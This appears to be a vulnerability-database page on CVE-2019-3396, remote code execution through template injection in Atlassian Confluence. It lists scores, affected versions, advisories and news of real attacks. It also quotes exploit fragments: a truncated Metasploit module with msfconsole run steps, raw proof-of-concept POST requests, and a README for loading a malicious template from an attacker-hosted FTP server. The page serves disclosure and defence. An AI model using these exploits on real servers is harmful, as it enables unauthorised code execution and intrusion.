10
CVSSv2

CVE-2019-3396

Published: 25/03/2019 Updated: 22/04/2019
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 prior to 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 prior to 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 prior to 6.14.2 (the fixed version for 6.14.x), allows remote malicious users to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.

Vulnerability Trend

Affected Products

Vendor Product Versions
AtlassianConfluence1.0, 1.0.1, 1.0.3, 1.1, 1.1.1, 1.1.2, 1.2, 1.2.1, 1.2.2, 1.2.3, 1.3, 1.3.1, 1.3.2, 1.3.4, 1.3.5, 1.3.6, 1.4, 1.4.1, 1.4.2, 1.4.3, 1.4.4, 2.6, 2.6.1, 2.6.2, 2.6.3, 2.7, 2.7.1, 2.7.2, 2.7.3, 2.7.4, 2.8, 2.8.1, 2.8.2, 2.8.3, 2.9, 2.9.1, 2.9.2, 2.9.3, 2.10, 2.10.1, 2.10.2, 2.10.3, 2.10.4, 3.0, 3.0.1, 3.0.2, 3.1, 3.1.1, 3.1.2, 3.2, 3.2.1, 3.3, 3.3.1, 3.3.3, 3.4, 3.4.1, 3.4.2, 3.4.3, 3.4.5, 3.4.6, 3.4.7, 3.4.8, 3.4.9, 3.5, 3.5.1, 3.5.2, 3.5.3, 3.5.4, 3.5.5, 3.5.6, 3.5.7, 3.5.9, 3.5.11, 3.5.13, 4.0, 4.0.3, 4.0.4, 4.0.5, 4.1, 4.1.2, 4.1.3, 4.1.4, 4.1.5, 4.1.6, 4.1.7, 4.1.9, 4.3, 4.3.1, 4.3.2, 4.3.3, 4.3.5, 4.3.6, 4.3.7, 5.0, 5.0.1, 5.0.2, 5.0.3, 5.1, 5.1.1, 5.1.2, 5.1.3, 5.1.4, 5.1.5, 5.2.3, 5.2.4, 5.2.5, 5.3, 5.3.1, 5.3.4, 5.4, 5.4.1, 5.4.2, 5.4.3, 5.4.4, 5.5, 5.5.0, 5.5.1, 5.5.2, 5.5.3, 5.5.6, 5.5.7, 5.6, 5.6.1, 5.6.3, 5.6.4, 5.6.5, 5.6.6, 5.7, 5.7.1, 5.7.3, 5.7.4, 5.7.5, 5.7.6, 5.8.2, 5.8.4, 5.8.5, 5.8.6, 5.8.8, 5.8.9, 5.8.10, 5.8.13, 5.8.14, 5.8.15, 5.8.16, 5.8.17, 5.8.18, 5.9.1, 5.9.2, 5.9.3, 5.9.4, 5.9.5, 5.9.6, 5.9.7, 5.9.8, 5.9.9, 5.9.10, 5.9.11, 5.9.12, 5.9.14, 5.10, 5.10.0, 5.10.1, 5.10.2, 5.10.3, 5.10.4, 5.10.5, 5.10.6, 5.10.7, 5.10.8, 6.0, 6.0.1, 6.0.2, 6.0.3, 6.0.4, 6.0.5, 6.0.6, 6.0.7, 6.1, 6.1.1, 6.1.2, 6.1.3, 6.1.4, 6.2, 6.2.1, 6.2.2, 6.2.3, 6.2.4, 6.3, 6.3.1, 6.3.2, 6.3.3, 6.3.4, 6.4, 6.4.1, 6.4.2, 6.4.3, 6.5, 6.5.1, 6.5.2, 6.5.3, 6.6, 6.6.1, 6.6.2, 6.6.3, 6.6.4, 6.6.5, 6.6.6, 6.6.7, 6.6.8, 6.6.9, 6.6.10, 6.6.11, 6.7.0, 6.7.1, 6.7.2, 6.7.3, 6.8, 6.8.1, 6.8.2, 6.8.3, 6.8.5, 6.9, 6.9.1, 6.9.3, 6.10, 6.10.1, 6.10.2, 6.11, 6.11.1, 6.11.2, 6.12, 6.12.1, 6.12.2, 6.13.0, 6.13.1, 6.13.2, 6.14.0, 6.14.1

Exploits

## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remo ...

Mailing Lists

Widget Connector Macro is part of Atlassian Confluence Server and Data Center that allows embed online videos, slideshows, photostreams and more directly into page A _template parameter can be used to inject remote Java code into a Velocity template, and gain code execution Authentication is not required to exploit this vulnerability By default, ...
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 This email refers to the advisory found at confluenceatlassiancom/display/DOC/Confluence+Security+Advisory+-+2019-03-20 CVE ID: * CVE-2019-3395 * CVE-2019-3396 Product: Confluence Server and Confluence Data Center Affected Confluence Server and Confluence Data Center product vers ...

Metasploit Modules

Atlassian Confluence Widget Connector Macro Velocity Template Injection

Widget Connector Macro is part of Atlassian Confluence Server and Data Center that allows embed online videos, slideshows, photostreams and more directly into page. A _template parameter can be used to inject remote Java code into a Velocity template, and gain code execution. Authentication is unrequired to exploit this vulnerability. By default, Java payload will be used because it is cross-platform, but you can also specify which native payload you want (Linux or Windows). Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected. This vulnerability was originally discovered by Daniil Dmitriev https://twitter.com/ddv_ua.

msf > use exploit/multi/http/confluence_widget_connector
      msf exploit(confluence_widget_connector) > show targets
            ...targets...
      msf exploit(confluence_widget_connector) > set TARGET <target-id>
      msf exploit(confluence_widget_connector) > show options
            ...show and set options...
      msf exploit(confluence_widget_connector) > exploit

Github Repositories

CVE-2019-3396

test1 githubcom/Yt1g3r/CVE-2019-3396_EXPgit

CVE-2019-3396 Confluence 未授权 RCE (CVE-2019-3396) 漏洞 坑点:有些版本需要加Referer才能成功 File Read POST /rest/tinymce/1/macro/preview HTTP/11 Host: 101020181 User-Agent: Mozilla/50 (Windows NT 100; Win64; x64; rv:550) Gecko/20100101 Firefox/550 Accept: text/plain, */*; q=001 Accept-Language: zh-CN,zh;q=08,en-US;q=05,en;q=03 Accept-Encoding: g

CVE-2019-3396_EXP CVE-2019-3396 confluence SSTI RCE 1、put the cmdvm on your website (must use ftp or https ,http doesn't work ) 2、modify RCE_exppy ,change the filename = 'ftp://1111/cmdvm' (python -m pyftpdlib -p 21) 3、python REC_exppy testwiki_testcc:8080 "whoami" $ python REC_exppy testwiki_testcc:8080 "id&q

CVE-2019-3396 Confluence Widget Connector path traversal (CVE-2019-3396) RCE POC POST /rest/tinymce/1/macro/preview HTTP/11 Host: xxxx Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozilla/50 (X11; Linux x86_64; rv:600) Gecko/20100101 Firefox/600 Content-Type: application/json; charset=utf-8 Referer: xxxx/pages/resumedraftaction?draf

CVE-2019-3396 Confluence Widget Connector path traversal (CVE-2019-3396) RCE POC POST /rest/tinymce/1/macro/preview HTTP/11 Host: xxxx Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozilla/50 (X11; Linux x86_64; rv:600) Gecko/20100101 Firefox/600 Content-Type: application/json; charset=utf-8 Referer: xxxx/pages/resumedraftaction?draf

CVE-2019-3396 Confluence RCE漏洞检测脚本

概述 该项目用于存放一些平时写的漏洞检测/利用脚本,不出意外会持续更新。 已有POC thinkphp v5 RCE漏洞 Confluence RCE漏洞,编号CVE-2019-3396 Weblogic wls async unserialization RCE漏洞,编号CVE-2019-2795

EGI Foundation Security Announcements 2019-04-10 security incident affecting collaboration tools 2019-04-16 Initial public announcement Last Wednesday, 10 April 2019, an intrusion was detected on the site used to host collaboration services for EGI, including the EGI SSO Identity Provider, Confluence installation of the EGI Foundation and the EOSC-hub and ENVRI+ projects The f

Confluence ssrf 보안취약점 malware클린 툴(kerberods) 컨플루언스의 보안 취약점을 이용한 ssrf 공격때문에 짜증나서 만들어봄 컨플루언스 보안 권고 메일 전문 보기(한국어 번역) CVE-2019-3396 위젯 커넥터 (Widget Connector) 취약점을 공격 하는 적극적인 익스플로잇 입니다 ( Confluence Security Advisory -

This is the official repository for the UnderattackToday Python module UnderattackToday Underattack is a free security intelligence platform For more information please visit underattacktoday API Underattack provides a free API described here: portalunderattacktoday/api/docs To use it you should register to the portal, it's free :) The Python module

项目简介 信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上再做持久化控制)、擦屁股。 安全相关资源列表 arxivorg 康奈尔大学(Cornell University)开放文档 githubcom/sindresorhus/awesome awesome系列 wwwowasporgcn/ow

Recent Articles

New Godlua Malware Evades Traffic Monitoring via DNS over HTTPS
BleepingComputer • Sergiu Gatlan • 03 Jul 2019

A Lua-based backdoor malware capable of targeting both Linux and Windows users while securing its communication channels via DNS over HTTPS (DoH) was discovered by researchers at Network Security Research Lab of Qihoo 360.
By using DoH to encapsulate the communication channels between command-and-control servers, the infected machines, and the attacker-controlled servers within HTTPS requests, the malware dubbed Godlua manages to block researchers from analyzing its traffic.
Godl...

Confluence Servers Hacked to Install Miners and Rootkits
BleepingComputer • Ionut Ilascu • 07 May 2019

After getting pounded with ransomware and malware for deploying distributed denial-of-service (DDoS) attacks, unpatched Confluence servers are now compromised to mine for cryptocurrency.
On March 20, Atlassian released patches for two critical-severity vulnerabilities affecting Confluence Server and Confluence Data Center. Of them, CVE-2019-3396, is a server-side template injection in the Widget Connector that can lead to remote code execution.
Three weeks later, cybercriminals crea...

Vulnerable Confluence Servers Get Infected with Ransomware, Trojans
BleepingComputer • Sergiu Gatlan • 26 Apr 2019

A critical Atlassian Confluence Server vulnerability is being remotely exploited by attackers to compromise both Linux and Windows servers, allowing them to drop GandCrab ransomware and the Dofloo (aka AES.DDoS, Mr. Black) Trojan.
The CVE-2019-3396 server-side template injection vulnerability is present in the Widget Connector in vulnerable versions and it allows "remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via serve...